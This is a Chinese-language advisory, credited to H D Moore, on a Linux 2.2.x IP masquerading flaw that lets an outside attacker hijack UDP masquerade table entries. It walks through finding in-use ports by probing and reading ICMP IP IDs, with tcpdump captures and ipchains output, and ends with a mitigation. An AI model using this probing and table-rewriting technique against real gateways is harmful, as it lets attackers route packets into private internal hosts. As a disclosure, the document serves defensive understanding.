Linux系统2.2.x内核的IP伪装实现中存在严重安全漏洞。在相关的核心代码中对连接情况缺乏认真的检查。攻击者可以重写核心中UDP伪装表项，使攻击者的UDP包可以被路由进内部机器。

当一个内部IP要访问外部网络的DNS服务器时，当发送的UDP包经过IP伪装网关时，内核会添加一个表项来记录这个连接。比如从内部主机A的1035端口连往外部主机C的53端口的一个UDP包，内核将这个包的源地址替换成伪装网关(B)的IP,源端口设置成网关上为此连接分配的一个端口，缺省是从61000端口到65096端口，因此理论上可以核心同时处理4096个TCP/UDP伪装连接。

Host A:1035 -> GW B:63767 -> Host C:53

当外部网络发送一个UDP包到伪装网关时，Linux IP伪装只根据目标端口来决定是否应该将这个UDP包转发到内部网络。如果目标端口在已经建立的伪装连接表中有对应表项，它就会将此包中的源ip和源端口更新相应表项的远程主机ip和端口。攻击者只要判断伪装网关的的端口就可能用自己的ip和端口来重写伪装连接表。伪装网关用来为伪装连接服务的端口范围通常是从61000到65096,因此外部攻击者很容易判断哪些端口已经被用来建立连接。攻击者可以向伪装网关的这些端口发送UDP检测包，然后检查端口的ICMP应答包的IP ID。每个主机每发一个包，它的TCP/IP栈中的IP ID会递增一。因此对于用于ip伪装的端口所发会的ICMP应答中将会有内部主机的IP ID.

这个ID通常会与网关主机的当前IP ID相差很多，通常都在1000以上。下面的例子就显示了利用弱点进行攻击的过程：

主机 A 是内部主机 (192.168.1.100)

主机 B 是伪装网关 (192.168.1.1 / 10.0.0.1)

主机 C 是一台外部DNS服务器 (10.0.0.25)

主机 X 是外部攻击者的IP (10.10.187.13)

进行检测之前，在伪装网关上执行命令：ipchains -L -M -n 来显示当前伪装连接表的情况：

> UDP 03:39.21 192.168.1.100 10.0.0.25 1035 (63767) -> 53

目前是从192.168.1.100的1035端口发往10.0.0.25的53端口的连接，伪装端口是63767

[ 从攻击者的机器上进行tcpdump得到的结果]

(为了更容易的看清楚问题，这里我们设置所有检测用的包的源端口为12345 )

[ 我们的检测将从61000端口开始，我们略掉了前面的一些结果 ]

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)

10.10.187.13.12345 > 10.0.0.1.63763: udp 0 (DF) [tos 0x18] (ttl 254, id 23069)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)

10.10.187.13.12345 > 10.0.0.1.63764: udp 0 (DF) [tos 0x18] (ttl 254, id 23070)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)

10.10.187.13.12345 > 10.0.0.1.63765: udp 0 (DF) [tos 0x18] (ttl 254, id 23071)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)

10.10.187.13.12345 > 10.0.0.1.63766: udp 0 (DF) [tos 0x18] (ttl 254, id 23074)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)

10.10.187.13.12345 > 10.0.0.1.63767: udp 0 (DF) [tos 0x18] (ttl 254, id 23083)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63767 unreachable [tos 0xd8] (ttl 244, id 17205)

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

上面这个包的ID是17205,它与13139相差已经超过4000了，这就是说，我们发现了一个经过伪装的连接。!!!

10.10.187.13.12345 > 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos 0xd8] (ttl 245, id 13140)

10.10.187.13.12345 > 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id 23088)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos 0xd8] (ttl 245, id 13141)

10.10.187.13.12345 > 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id 23090)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63770 unreachable [tos 0xd8] (ttl 245, id 13142)

10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23091)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos 0xd8] (ttl 245, id 13143)

10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23092)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos 0xd8] (ttl 245, id 13144)

[ 我们的检测到65096端口结束，我们省略了一些结果 ]

现在我们再来检查一下伪装网关的伪装连接表的情况：

ipchains -L -M -n

> UDP 04:35.12 192.168.1.100 10.10.187.13 1035 (63767) -> 12345

可以看到，现在远程主机已经换成了攻击者的ip:10.10.187.13,目标端口也换成了攻击者检测用的源端口:12345

现在攻击者就可以从12345源端口发送UDP数据给内部主机的1035端口了。

<* 来源：H D Moore *>

--------------------------------------------------------------------------------

建议:

对于访问外部DNS的问题，一个可能的解决办法是在伪装网关上设置一个缓存域名服务器，然后禁止UDP包的伪装。